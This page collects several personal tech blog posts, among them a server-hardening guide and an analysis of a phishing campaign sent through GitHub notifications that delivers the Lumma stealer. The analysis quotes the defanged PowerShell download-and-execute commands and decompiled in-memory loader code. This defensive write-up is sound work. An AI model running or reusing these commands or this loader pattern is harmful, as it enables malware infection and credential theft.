Full Width [alt+shift+f] Shortcuts [alt+shift+k]
Sign Up [alt+shift+s] Log In [alt+shift+l]
18
Recently I have received some questions from users of both TLS Inspector and DNS Inspector enquiring why the apps aren't available on Apple's new Vision Pro headset. While I have briefly discussed this over on my Mastodon, I figured it might be worthwhile putting things down with a bit more permanence. There are two main reasons why I am not making these apps available on the platform: exclusivity and support. A Future of Computing, If You Can Afford It. Apple loudly and proudly calls their new headset the future of computing, marshalling us into the age of spatial computing. However at US$3,500 some (myself) would say that this future is only available to those who can afford it. Three thousand five hundred dollars is, in no small terms, a lot of money for those on budget, and firmly places this item in the category of being an expensive toy. TLS and DNS Inspector are free apps that I spend a great deal of effort making available to as many people as possible. I work to ensure that...
9 months ago

Improve your reading experience

Logged in users get linked directly to articles resulting in a better reading experience. Please login for free, it takes less than 1 minute.

More from Ian's Blog

Securing My Web Infrastructure

Securing My Web Infrastructure A few months ago, I very briefly mentioned that I've migrated all my web infrastructure off Cloudflare, as well as having built a custom web service to host it all. I call this new web service WebCentral and I'd like to talk about some of the steps I've taken and lessons I've learned about how I secure my infrastructure. Building a Threat Model Before you can work to secure any service, you need to understand what your threat model is. This sounds more complicated than it really is; all you must do is consider what your risks how, how likely those risks are to be realized, and what the potential damage or impact those risks could have. My websites don't store or process any user data, so I'm not terribly concerned about exfiltration, instead my primary risks are unauthorized access to the server, exploitation of my code, and denial of service. Although the risks of denial of service are self-explanatory, the primary risk I see needing to protect against is malicious code running on the machine. Malicious actors are always looking for places to run their cryptocurrency miners or spam botnets, and falling victim to that is simply out of the question. While I can do my best to try and ensure I'm writing secure code, there's always going to be the possibility that I or someone else makes a mistake that turns into an exploitable weakness. Therefore, my focus is on minimizing the potential impact should this occur. VPS Security The server that powers the very blog you're reading is a VPS, virtual private server, hosted by Azure. A VPS is just a fancy way to say a virtual machine that you have mostly total control over. A secure web service must start with a secure server hosting it, so let's go into detail about all the steps I take to keep the server safe. Network Security Minimizing the internet-facing exposure is critical for any VPS and can be one of the most effective ways to keep a machine safe. My rule is simple, no open ports other than what is required for user traffic. In effect this only means one thing: I cannot expose SSH to the internet. Doing so protects me against a wide range of threats and also reduces the impact from scanners (more on them later). While Azure itself offers several of ways to interact with a running VPS, I've chosen to disable most of those features and instead rely on my own. I personally need to be able to access the machine over SSH, however, so how do I do that if SSH is blocked? I use a VPN. On my home network is a WireGuard VPN server as well as a Dynamic DNS setup to work-around my rotating residential IP address. The VM will try to connect to the WireGuard VPN on my home network and establish a private tunnel between them. Since the VM is the one initiating the connection (acting as a client) no port must be exposed. With this configuration I can effortlessly access and manage the machine without needing to expose SSH to the internet. I'm also experimenting with, but have not yet fully rolled out, an outbound firewall. Outbound firewalls are far, far more difficult to set up than inbound because you must first have a very good understanding of what and where your machine talks to. OS-Level Security Although the internet footprint of my VPS is restricted to only HTTP and HTTPS, I still must face the risk of someone exploiting a vulnerability in my code. I've taken a few steps to help minimize the impact from a compromise to my web application's security. Automatic Updates First is some of the most basic things everyone should be doing, automatic updates & reboots. Every day I download and install any updates and restart the VPS if needed. All of this is trivially easy with a cron job and built-in tooling. I use this script that runs using a cron job: #!/bin/bash # Check for updates dnf check-update > /dev/null if [[ $? == 0 ]]; then # Nothing to update exit 0 fi # Install updates dnf -y update # Check if need to reboot dnf needs-restarting -r if [[ $? == 1 ]]; then reboot fi Low-Privileged Accounts Second, the actual process serving traffic does not run as root, instead it runs as a dedicated service user without a shell and without sudo permission. Doing this limits the abilities of what an attacker might be able to do, should they somehow have the ability to execute shell code on the machine. A challenge with using non-root users for web services is a specific security restriction enforced by Linux: only the root user can bind to port at or below 1024. Thankfully, however, SystemD services can be granted additional capabilities, one of which is the capability to bind to privileged ports. A single line in the service file is all it takes to overcome this challenge. Filesystem Isolation Lastly, the process also uses a virtualized root filesystem, a process known as chroot(). Chrooting is a method where the Linux kernel effectively lies to the process about where the root of the filesystem is by prepending a path to every call to access the filesystem. To chroot a process, you provide a directory that will act as the filesystem root for that process, meaning if the process were to try and list of contents of the root (/), they'd instead be listing the contents of the directory you specified. When configured properly, this has the effect of an filesystem allowlist - the process is only allowed to access data in the filesystem that you have specifically granted for it, and all of this without complicated permissions. It's important to note, however, that chrooting is often misunderstood as a more involved security control, because it's often incorrectly called a "jail" - referring to BSD's jails. Chrooting a process only isolates the filesystem from the process, but nothing else. In my specific use case it serves as an added layer of protection to guard against simple path transversal bugs. If an attacker were somehow able to trick the server into serving a sensitive file like /etc/passwd, it would fail because that file doesn't exist as far as the process knows. For those wondering, my SystemD service file looks like this: [Unit] Description=webcentral After=syslog.target After=network.target [Service] # I utilize systemd's heartbeat feature, sd-notify Type=notify NotifyAccess=main WatchdogSec=5 # This is the directory that serves as the virtual root for the process RootDirectory=/opt/webcentral/root # The working directory for the process, this is automatically mapped to the # virtual root so while the process sees this path, in actuality it would be # /opt/webcentral/root/opt/webcentral WorkingDirectory=/opt/webcentral # Additional directories to pass through to the process BindReadOnlyPaths=/etc/letsencrypt # Remember all of the paths here are being mapped to the virtual root ExecStart=/opt/webcentral/live/webcentral -d /opt/webcentral/data --production ExecReload=/bin/kill -USR2 "$MAINPID" TimeoutSec=5000 Restart=on-failure # The low-privilege service user to run the process as User=webcentral Group=webcentral # The additional capability to allow this process to bind to privileged ports CapabilityBoundingSet=CAP_NET_BIND_SERVICE [Install] WantedBy=default.target To quickly summarize: Remote Access (SSH) is blocked from the internet, a VPN must be used to access the VM, updates are automatically installed on the VM, the web process itself runs as a low-privileged service account, and the same process is chroot()-ed to shield the VMs filesystem. Service Availability Now it's time to shift focus away from the VPS to the application itself. One of, if not the, biggest benefits of running my own entire web server means that I can deeply integrate security controls how I best see fit. For this, I focus on detection and rejection of malicious clients. Being on the internet means you will be constantly exposed to malicious traffic - it's just a fact of life. The overwhelming majority of this traffic is just scanners, people going over every available IP address and looking widely known and exploitable vulnerabilities, things like leaving credentials out in the open or web shells. Generally, these scanners are one and done - you'll see a small handful of requests from a single address and then never again. I find that trying to block or prevent these scanners is a bit of a fool's errand, however by tracking these scanners over time I can begin to identify patterns to proactively block them early, saving resources. Why this matters is not because of the one-and-done scanners, but instead the malicious ones, the ones that don't just send a handful of requests - they send hundreds, if not thousands, all at once. These scanners risk degrading the service for others by occupying server resources that would better be used for legitimate visitors. To detect malicious hosts, I employ some basic heuristic by focusing on the headers sent by the client, and the paths they're trying to access. Banned Paths Having collected months of data from the traffic I served, I was able to identify some of the most common paths these scanners are looking for. One of the more common treds I see if scanning for weak and vulnerable WordPress configurations. WordPress is an incredibly common content management platform, which also makes it a prime target for attackers. Since I don't use WordPress (and perhaps you shouldn't either...) this made it a good candidate for scanner tracking. Therefore, any request where the path contains any of: "wp-admin", "wp-content", "wp-includes", or "xmlrpc.php" are flagged as malicious and recorded. User Agents The User Agent header is data sent by your web browser to the server that provides a vague description of the browser and the device it's running on. For example, my user agent when I wrote this post is: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 All this really tells the server is that I'm on a Mac running macOS 15 and using Firefox 128. One of the most effective measures I've found to block malicious traffic early is to do some very basic filtering by user agent. The simplest and most effective measure thus far has been to block requests that have no user agent header. I also have a growing list of bogus user agent values, where the header looks valid - but if you check the version numbers of the system or browser, nothing lines up. IP Firewall When clients start getting a bit too rowdy, they get put into the naughty corner temporarily blocked from connecting. Blocked connections happen during the TCP handshake, saving resources as we skip the TLS negotiation. Addresses are blocked 24 hours, and I found this time to be perfectly adequate as most clients quickly give up and move on. ASN Blocks In some extreme situations, it's necessary to block entire services and all of their addresses from accessing my server. This happens when a network provider, such as an ISP, VPN, or cloud provider, fails to do their job in preventing abuse of their services and malicious find home there. Cloud providers have a responsibility to ensure that if a malicious customer is using their service, they would terminate their accounts and stop providing their services. For the most part, these cloud providers do a decent enough job at that. Some providers, however, don't care - at all - and quickly become popular amongst malicious actors. Cloudflare and Alibaba are two great examples. Because of the sheer volume of malicious traffic and total lack of valid user traffic, I block all of Cloudflare and Alibaba's address space. Specifically, I block AS13335 and AS45102. Putting It All Together Summarized, this is the path a request takes when connecting to my server: Upon recieving a TCP connection, the IP address of the client is checked if it's either in a blocked ASN or is individually blocked. If so, the request is quickly rejected. Otherwise, TLS is negotiated, allowing the server to see the details of the actual HTTP request. We then check if the request is for a banned path, or has a banned user agent, if so the IP is blocked for 24 hours and the request is rejected, otherwise the request is served as normal. The Result I feel this graph speaks for itself: This graph shows the number of requests that were blocked per minute. These bursts are the malicious scanners that I'm working to block, and all of these were successful defences against them. This will be a never-ending fight, but that's part of the fun, innit?

3 weeks ago 14 votes
Hardware-Accelerated Video Encoding with Intel Arc on Redhat Linux

I've been wanting hardware-accelerated video encoding on my Linux machine for quite a while now, but ask anybody who's used a Linux machine and they'll tell you of the horrors of Nvidia or AMD drivers. Intel, on the other hand, seems to be taking things in a much different, much more positive direction when it comes to their Arc graphics cards. I've heard positive things from people who use them about the relativly painless driver experience, at least when compared to Nvidia. So I went out and grabbed a used Intel Arc A750 locally and installed it in my server running Rocky 9.4. This post is to document what I did to install the required drivers and support libraries to be able to encode videos with ffmpeg utilizing the hardware of the GPU. This post is specific to Redhat Linux and all Redhat-compatible distros (Rocky, Oracle, etc). If you're using any other distro, this post likely won't help you. Driver Setup The drivers for Intel Arc cards were added into the Linux Kernel in version 6.2 or later, but RHEL 9 uses kernel version 5. Thankfully, Intel provides a repo specific to RHEL 9 where they offer precompiled backports of the drivers against the stable kernel ABI of RHEL 9. Add the Intel Repo Add the following repo file to /etc/yum.repos.d. Note that I'm using RHEL 9.4 here. You will likely need to change 9.4 to whatever version you are using by looking in /etc/redhat-release. Update the baseurl value and ensure that URL exists. [intel-graphics-9.4-unified] name=Intel graphics 9.4 unified enabled=1 gpgcheck=1 baseurl=https://repositories.intel.com/gpu/rhel/9.4/unified/ gpgkey=https://repositories.intel.com/gpu/intel-graphics.key Run dnf clean all for good measure. Install the Software dnf install intel-opencl \ intel-media \ intel-mediasdk \ libmfxgen1 \ libvpl2 \ level-zero \ intel-level-zero-gpu \ mesa-dri-drivers \ mesa-vulkan-drivers \ mesa-vdpau-drivers \ libdrm \ mesa-libEGL \ mesa-lib Reboot your machine for good measure. Verify Device Availability You can verify that your GPU is seen using the following: clinfo | grep "Device Name" Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics ffmpeg Setup Install ffmpeg ffmpeg needs to be compiled with libvpl support. For simplicities sake, you can use this pre-compiled static build of ffmpeg. Download the ffmpeg-master-latest-linux64-gpl.tar.xz binary. Verify ffmpeg support If you're going to use a different copy of ffmpeg, or compile it yourself, you'll want to verify that it has the required support using the following: ./ffmpeg -hide_banner -encoders|grep "qsv" V..... av1_qsv AV1 (Intel Quick Sync Video acceleration) (codec av1) V..... h264_qsv H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10 (Intel Quick Sync Video acceleration) (codec h264) V..... hevc_qsv HEVC (Intel Quick Sync Video acceleration) (codec hevc) V..... mjpeg_qsv MJPEG (Intel Quick Sync Video acceleration) (codec mjpeg) V..... mpeg2_qsv MPEG-2 video (Intel Quick Sync Video acceleration) (codec mpeg2video) V..... vp9_qsv VP9 video (Intel Quick Sync Video acceleration) (codec vp9) If you don't have any qsv encoders, your copy of ffmpeg isn't built correctly. Converting a Video I'll be using this video from the Wikimedia Commons for reference, if you want to play along at home. This is a VP9-encoded video in a webm container. Let's re-encode it to H.264 in an MP4 container. I'll skip doing any other transformations to the video for now, just to keep things simple. ./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v h264_qsv Sea_to_Sky_Highlights.mp4 The key parameter here is telling ffmpeg to use the h264_qsv encoder for the video, which is the hardware-accelerated codec. Let's see what kind of difference using hardware acceleration makes: Encoder Time Average FPS h264_qsv (Hardware) 3.02s 296 libx264 (Software) 1m2.996s 162 Using hardware acceleration sped up this operation by 95%. Naturally your numbers won't be the same as mine, as there's lots of variables at play here, but I feel this is a good demonstration that this was a worthwhile investment.

6 months ago 28 votes
Having a Website Used to Be Fun

According to the Wayback Machine, I launched my website over a decade ago, in 2013. Just that thought alone makes me feel old, but going back through the old snapshots of my websites made me feel a profound feeling of longing for a time when having a website used to be a novel and enjoyable experience. The Start Although I no longer have the original invoice, I believe I purchased the ianspence.com domain in 2012 when I was studying web design at The Art Institute of Vancouver. Yes, you read that right, I went to art school. Not just any, mind you, but one that was so catastrophically corrupt and profit-focused that it imploded as I was studying there. But thats a story for another time. I obviously didn't have any real plan for what I wanted my website to be, or what I would use it for. I simply wanted a web property where I could play around with what I was learning in school and expand my knowledge of PHP. I hosted my earliest sites from a very used Dell Optiplex GX280 tower in my house on my residential internet. Although the early 2010's were a rough period of my life, having my very own website was something that I was proud of and deeply enjoyed. Somewhere along the way, all that enjoyment was lost. And you don't have to take my own word for it. Just compare my site from 2013 to the site from when I wrote this post in 2024. Graphic Design was Never My Passion 2013's website has an animated carousel of my photography, bright colours, and way too many accordions. Everything was at 100% because I didn't really care about so much about the final product more as I was just screwing around and having fun. 2024's website is, save for the single sample of my photography work, a resume. Boring, professional, sterile of anything resembling personality. Even though the style of my site became more and more muted over the years, I continued to work and build on my site, but what I worked on changed as what I was interested in grew. In the very early 2010s I thought I wanted to go into web design, but after having suffered 4 months of the most dysfunctional Art school there is, I realized that maybe it was web development that interested me. That, eventually, grew into the networking and infrastructure training I went through, and the career I've built for myself. Changing Interests As my interests changed, my focus on the site became less about the design and appearance and more towards what was serving the site itself. My site literally moved out from the basement suite I was living in to a VPS, running custom builds of PHP and Apache HTTPD. At one point, I even played around with load-balancing between my VPS and my home server, which had graduated into something much better than that Dell. Or, at least until my internet provider blocked inbound port 80. This is right around when things stopped being fun anymore. When Things Stopped Being Fun Upon reflection, there were two big mistakes I made that stole all of the enjoyment out of tinkering with my websites: Cloudflare and Scaling. Cloudflare A dear friend of mine (that one knows I'm referring to it) introduced me to Cloudflare sometime in 2014, which I believe was the poison pill that started my journey into taking the fun out of things for me. You see, Cloudflare is designed for big businesses or people with very high traffic websites. Neither of which apply to me. I was just some dweeb who liked PHP. Cloudflare works by sitting between your website's hosting server and your visitors. All traffic from your visitors flows through Cloudflare, where they can do their magic. When configured properly, the original web host is effectively hidden from the web, as people have to go through Cloudflare first. This was the crux of my issues, at least with the focus of this blog post, with Cloudflare. For example, before Lets Encrypt existed, Cloudflare did not allow for TLS at all on their free plans. This was right at the time when I was just starting to learn about TLS, but because I had convinced myself that I had to use Cloudflare, I could never actually use it on my website. This specific problem of TLS never went away, either, as even though Cloudflare now offers free TLS - they have total control over everything and they have the final say in what is and isn't allowed. The problems weren't just TLS, of course, because if you wanted to handle non-HTTP traffic then you couldn't use Cloudflare's proxy. Once again, I encountered the same misguided fear that exposing my web server to the internet was a recipe for disaster. Scaling (or lack thereof) The other, larger, mistake I made was an obsession with scaling and security. Thanks to my education I had learned a lot about enterprise networking and systems administration, and I deigned to apply those skills to my own site. Aggressive caching, using global CDNs, monitoring, automated deployments, telemetry, obsession over response times, and probably more I'm not remembering. All for a mostly static website for a dork that had maybe 5 page views a month. This is a mistake that I see people make all the time, not even just exclusive for websites - people think that they need to be concerned about scaling problems without first asking if those problems even or will ever apply to them. If I was able to host my website from an abused desktop tower with blown caps on cable internet just fine, then why in the world would I need to be obsessing over telemetry and response times. Sadly things only got even worse when I got into cybersecurity, because now on top of all the concerns with performance and scale, I was trying to protect myself from exceedingly unlikely threats. Up until embarrassingly recently I was using complicated file integrity checks using hardware-backed cryptographic keys to ensure that only I could make changes to the content of my site. For some reason, I had built this threat model in my head where I needed to protect against malicious changes on an already well-protected server. All of this created an environment where making any change at all was a cumbersome and time-consuming task. Is it any wonder why I ended up making my site look like a resume when doing any changes to it was so much work? The Lesson I Learned All of this retrospective started because of the death of Cohost, as many of the folks there (myself included) decided to move to posting on their own blogs. This gave me a great chance to see what some of my friends were doing with their sites, and unlocking fond memories of back in 2012 and 2013 when I too was just having fun with my silly little website. All of this led me down to the realization of the true root cause of my misery: In an attempt to try and mimic what enterprises do with their websites in terms of stability and security, I made it difficult to make any changes to my site. Realizing this, I began to unravel the design and decisions I had made, and come up with a much better, simpler, and most of all enjoyable design. How my Website Used to Work The last design of my website that existed before I came to the conclusions I discussed above was as follows: My website was a packaged Docker container image which ran nginx. All of the configuration and static files were included in the image, so theoretically it could run anywhere. That image was being run on Azure Container Instances, a managed container platform, with the image hosted on Azure Container Registries. Cloudflare sat in-front of my website and proxied all connections to it. They took care of the domain registration, DNS, and TLS. Whenever I wanted to make changes to my site, I would create a container image, sign it using a private key on my YubiKey, and push that to Github. A Github action would then deploy that image to Azure Container Registries and trigger the container to restart, pulling the new image. How my Website Works Now Now that you've seen the most ridiculous design for some dork's personal website, let me show you how it works now: Yes, it's really that simple. My websites are now powered by a virtual machine with a public IP address. When users visit my website, they talk directly to that virtual machine. When I want to make changes to my website, I just push them directly to that machine. TLS certificates are provided by Lets Encrypt. I still use Cloudflare as my domain registrar and DNS provider, but - crucially - nothing is proxied through Cloudflare. When you loaded this blog post, your browser talked directly to my server. It's almost virtually identical to the way I was doing things in 2013, and it's been almost invigorating to shed this excess weight and unnecessary complications. But there's actually a whole lot going on behind the scenes that I'm omitting from this graph. Static Websites Are Boring A huge problem with my previous design is that I had locked myself into only having a pure static website, and static websites are boring! Websites are more fun when they can, you know, do things, and doing things with static websites is usually dependent on Javascript and doing them in the users browser. That's lame. Let's take a really simple example: Sometimes I want to show a banner on the top of my website. In a static-only website, unless you hard-code that banner into the HTML, doing this from a static site would require that you use JavaScript to check some backend if a banner should be displayed, and if so - render it. But on a dynamic page? Where server-side rendering is used? This is trivially easy. A key change with my new website is switching away from using containers, which are ephemeral and immutable, over to using a virtual machine, which isn't, and to go back to server-side rendering. I realized that a lot of the fun I was having back then was because PHP is server-side, and you can do a lot of wacky things when you have total control over the server! I'm really burying the lede here, but my new site is powered not by nginx, or httpd, but instead my own web server. Entirely custom and designed for tinkering and hacking. Combined with no longer having to deal with Cloudflare, has given me total control to do whatever the hell I want. Maybe I'll do another post some day talking about this - but I've written enough about websites for one day. Wrapping Up That feeling of wanting to do whatever the hell I want really does sum up the sentiment I've come to over the past few weeks. This is my website. I should be able to do whatever I want with it, free from my self-imposed judgement or concern over non-issues. Kill the cop in your head that tells you to share the concerns that Google has. You're not Google. Websites should be fun. Enterprise tools like Cloudflare and managed containers aren't.

6 months ago 27 votes
GitHub Notification Emails Hijacked to Send Malware

As an open source developer I frequently get emails from GitHub, most of these emails are notifications sent on behalf of GitHub users to let me know that somebody has interacted with something and requires my attention. Perhaps somebody has created a new issue on one of my repos, or replied to a comment I left, or opened a pull request, or perhaps the user is trying to impersonate GitHub security and trick me into downloading malware. If that last one sounds out of place, well, I have bad news for you - it's happened to me. Twice. In one day. Let me break down how this attack works: The attacker, using a throw-away GitHub account, creates an issue on any one of your public repos The attacker quickly deletes the issue You receive a notification email as the owner of the repo You click the link in the email, thinking it's legitimate You follow the instructions and infect your system with malware Now, as a savvy computer-haver you might think that you'd never fall for such an attack, but let me show you all the clever tricks employed here, and how attackers have found a way to hijack GitHub email system to send malicious emails directly to project maintainers. To start, let's look at the email message I got: In text form (link altered for your safety): Hey there! We have detected a security vulnerability in your repository. Please contact us at [https://]github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Without me having already told you that this email is a notification about a new GitHub issue being created on my repo, there's virtually nothing to go on that would tell you that, because the majority of this email is controlled by the attacker. Everything highlighted in red is, in one way or another, something the attacker can control - meaning the text or content is what they want it to say: Unfortunately the remaining parts of the email that aren't controlled by the attacker don't provide us with any sufficient amount of context to know what's actually going on here. Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message. The attacker impersonates the "Github Security Team", and because this email is a legitimate email sent from Github, it passes most of the common phishing checks. The email is from Github, and the link in the email goes to where it says it does. GitHub can improve on these notification emails to reduce the effectiveness of this type of attack by providing more context about what action is the email for, reducing the amount of attacker-controlled content, and improving clarity about the sender of the email. I have contacted Github security (the real one, not the fake imposter one) and shared these emails with them along with my concerns. The Website If you were to follow through with the link on that email, you'd find yourself on a page that appears to have a captcha on it. Captcha-gated sites are annoyingly common, thanks in part to services like Cloudflare which offers automated challenges based on heuristics. All this to say that users might not find a page immediately demanding they prove that they are human not that out of the ordinary. What is out of the ordinary is how the captcha works. Normally you'd be clicking on a never-ending slideshow of sidewalks or motorcycles as you definitely don't help train AI, but instead this site is asking you to take the very specific step of opening the Windows Run box and pasting in a command. Honestly, if solving captchas were actually this easy, I'd be down for it. Sadly, it's not real - so now let's take a look at the malware. The Malware The site put the following text in my clipboard (link modified for your safety): powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752" We'll consider this stage 1 of 4 of the attack. What this does is start a new Windows PowerShell process with the window hidden and run a command to download a script file and execute it. iex is a built-in alias for Invoke-Expression, and iwr is Invoke-WebRequest. For Linux users out there, this is equal to calling curl | bash. A comment is at the end of the file that, due to the Windows run box being limited in window size, effectively hides the first part of the script, so the user only sees this: Between the first email I got and the time of writing, the URL in the script have changed, but the contents remain the same. Moving onto the second stage, the contents of the evaluated script file are (link modified for your safety): $webClient = New-Object System.Net.WebClient $url1 = "[https://]github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe This script is refreshingly straightforward, with virtually no obfuscation. It downloads a file l6E.exe, saves it as <User Home>\AppData\Local\Temp\SysSetup.exe, and then runs that file. I first took a look at the exe itself in Windows Explorer and noticed that it had a digital signature to it. The certificate used appears to have come from Spotify, but importantly the signature of the malicious binary is not valid - meaning it's likely this is just a spoofed signature that was copied from a legitimately-signed Spotify binary. The presence of this invalid codesigning signature itself is interesting, because it's highlighted two weaknesses with Windows that this malware exploits. I would have assumed that Windows would warn you before it runs an exe with an invalid code signature, especially one downloaded from the internet, but turns out that's not entirely the case. It's important to know how Windows determines if something was downloaded from the internet, and this is done through what is commonly called the "Mark of the Web" (or MOTW). In short, this is a small flag set in the metadata of the file that says it came from the internet. Browsers and other software can set this flag, and other software can look for that flag to alter settings to behave differently. A good example is how Office behaves with a file downloaded from the internet. If you were to download that l6E.exe file in your web browser (please don't!) and tried to open it, you'd be greeted with this hilariously aged dialog. Note that at the bottom Windows specifically highlights that this application does not have a valid signature. But this warning never appears for the victim, and it has to do with the mark of the web. Step back for a moment and you'll recall that it's not the browser that is downloading this malicious exe, instead it's PowerShell - or, more specifically, it's the System.Net.WebClient class in .NET Framework. This class has a method, DownloadFile which does exactly that - downloads a file to a local path, except this method does not set the MOTW flag for the downloaded file. Take a look at this side by side comparison of the file downloaded using the same .NET API used by the malware on the left and a browser on the right: This exposes the other weakness in Windows; Windows will only warn you when you try to run an exe with an invalid digital signature if that file has the mark of the web. It is unwise to rely on the mark of the web in any way, as it's trivially easy to remove that flag. Had the .NET library set that flag, the attacker could have easily just removed it before starting the process. Both of these weaknesses have been reported to Microsoft, but for us we should stop getting distracted by code signing certificates and instead move on to looking at what this dang exe actually does. I opened the exe in Ghidra and then realized that I know nothing about assembly or reverse engineering, but I did see mentions of .NET in the output, so I moved to dotPeek to see what I could find. There's two parts of the code that matter, the entrypoint and the PersonalActivation method. The entrypoint hides the console window, calls PersonalActivation twice in a background thread, then marks a region of memory as executable with VirtualProtect and then executes it with CallWindowProcW. private static void Main(string[] args) { Resolver resolver = new Resolver("Consulter", 100); Program.FreeConsole(); double num = (double) Program.UAdhuyichgAUIshuiAuis(); Task.Run((Action) (() => { Program.PersonalActivation(new List<int>(), Program.AIOsncoiuuA, Program.Alco); Program.PersonalActivation(new List<int>(), MoveAngles.userBuffer, MoveAngles.key); })); Thread.Sleep(1000); uint ASxcgtjy = 0; Program.VirtualProtect(ref Program.AIOsncoiuuA[0], Program.AIOsncoiuuA.Length, 64U, ref ASxcgtjy); int index = 392; Program.CallWindowProcW(ref Program.AIOsncoiuuA[index], MoveAngles.userBuffer, 0, 0, 0); } The PersonalActivation function takes in a list and two byte arrays. The list parameter is not used, and the first byte array is a data buffer and the second is labeled as key - this, plus the amount of math they're doing, gives it away that is is some form of decryptor, though I'm not good enough at math to figure out what algorithm it is. I commented out the two calls to VirtualProtect and CallWindowProcW and compiled the rest of the code and ran it in a debugger, so that I could examine the contents of the two decrypted buffers. The first buffer contains a call to CreateProcess 00000000 55 05 00 00 37 13 00 00 00 00 00 00 75 73 65 72 U...7.......user 00000010 33 32 2E 64 6C 6C 00 43 72 65 61 74 65 50 72 6F 32.dll.CreatePro 00000020 63 65 73 73 41 00 56 69 72 74 75 61 6C 41 6C 6C cessA.VirtualAll 00000030 6F 63 00 47 65 74 54 68 72 65 61 64 43 6F 6E 74 oc.GetThreadCont 00000040 65 78 74 00 52 65 61 64 50 72 6F 63 65 73 73 4D ext.ReadProcessM 00000050 65 6D 6F 72 79 00 56 69 72 74 75 61 6C 41 6C 6C emory.VirtualAll 00000060 6F 63 45 78 00 57 72 69 74 65 50 72 6F 63 65 73 ocEx.WriteProces 00000070 73 4D 65 6D 6F 72 79 00 53 65 74 54 68 72 65 61 sMemory.SetThrea 00000080 64 43 6F 6E 74 65 78 74 00 52 65 73 75 6D 65 54 dContext.ResumeT 00000090 68 72 65 61 64 00 39 05 00 00 BC 04 00 00 00 00 hread.9...¼..... 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0 00 00 00 00 00 00 43 3A 5C 57 69 6E 64 6F 77 73 ......C:\Windows 000000C0 5C 4D 69 63 72 6F 73 6F 66 74 2E 4E 45 54 5C 46 \Microsoft.NET\F 000000D0 72 61 6D 65 77 6F 72 6B 5C 76 34 2E 30 2E 33 30 ramework\v4.0.30 000000E0 33 31 39 5C 52 65 67 41 73 6D 2E 65 78 65 00 37 319\RegAsm.exe.7 [...] And the second buffer, well, just take a look at the headers you might just see what's going on :) 00000000 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00 MZx............. 00000010 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 ............x... 00000040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ..º..´.Í!¸.LÍ!Th 00000050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 00000060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 00000070 6D 6F 64 65 2E 24 00 00 50 45 00 00 4C 01 04 00 mode.$..PE..L... So now we know that the large byte arrays at the top of the code are an "encrypted" exe that this loader puts into memory, marks it as executable, and then executes it. Marvelous. Sadly, this is where I hit a wall as my skills at reverse engineering applications are very limited. The final stage of the attack is a Windows exe, but not one made with .NET, and I don't really know what I'm looking at in the output from Ghidra. Thankfully, however, actual professionals have already done the work for me! Naturally, I put both the first and second binaries into VirusTotal and found that they were already flagged by a number of AVs. A common pattern in the naming was "LUMMASTEALER", which gives us our hint as to what this malware is. Lumma is one of many malware operations (read: gangs) that offer a "malware as a service" product. Their so-called "stealer" code searches through your system for cryptocurrency wallets, stored credentials, and other sensitive data. This data is then sent to their command-and-control (C2) servers where the gang can then move on to either stealing money from you, or profit from selling your data online. Lumma's malware tends to not encrypt victims devices such as traditional ransomware operations do. For more information I recommend this excellent write-up from Cyfirma. If you made it this far, thanks for reading! I had a lot of fun looking into the details of this attack, ranging from the weakness in Github's notification emails to the multiple layers of the attack. Some of the tools I used to help me do this analysis were: Windows Sandbox Ghidra dotPeek HxD Visual Studio Updates: Previously I said that the codesigning certificate was stolen from Spotify, however after discussing my findings with DigiCert we agreed that this is not the case and rather that the signature is being spoofed.

7 months ago 20 votes
Mourning the Loss of Cohost

The staff running Cohost have announced (archived) that at the end of 2024 Cohost will be shutting down, with the site going read-only on October 1st 2024. This news was deeply upsetting to receive, as Cohost filled a space left by other social media websites when they stopped being fun and became nothing but tools of corporations. Looking Back I joined Cohost in October of 2022 when it was still unclear if elon musk would go through with his disastrous plan to buy twitter. The moment that deal was confirmed, I abandoned my Twitter account and switched to using Cohost only for a time and never looked back once. I signed up for Cohost Plus! a week later after seeing the potential for what Cohost could become, and what it could mean for a less commercial future. I believed in Cohost. I believed that I could be witness to the birth of a better web, not built on advertising, corporate greed, privacy invasion - but instead on a focus of people, the content they share, and the communities they build. The loss of Cohost is greater than just the loss of the community of friends I've made, it's the dark cloud that has now formed over people who shared their vision, the rise of the question of "why bother". When I look back to my time on twitter, I'm faced with mixed feelings. I dearly miss the community that I had built there - some of us scattered to various places, while others decided to take their leave entirely from social media. I am sad knowing that, despite my best efforts of trying to maintain the connections I've made, I will lose touch with my friends because there is no replacement for Cohost. Although I miss my friends from twitter, I've come to now realize how awful twitter was for me and my well-being. It's funny to me that back when I was using twitter, I and seemingly everybody else knew that twitter was a bad place, and yet we all continued to use it. Even now, well into its nazi bar era, people continue to use it. Cohost showed what a social media site could be if the focus was not on engagement, but on the community. The lack of hard statistics like follower or like count meant that Cohost could never be a popularity contest - and that is something that seemingly no other social media site has come to grips with. The Alternatives Many people are moving, or have already moved, to services like Mastodon and Bluesky. While I am on Mastodon, these services have severe flaws that make them awful as a replacement for Cohost. Mastodon is a difficult to understand web of protocols, services, terminology, and dogma. It suffers from critical "open source brain worm" where libertarian ideals take priority over important safety and usability aspects, and I do not see any viable way to resolve these issues. Imagine trying to convince somebody who isn't technical to "join mastodon". How are they ever going to understand the concept of decentralization, or what an instance is, or who runs the 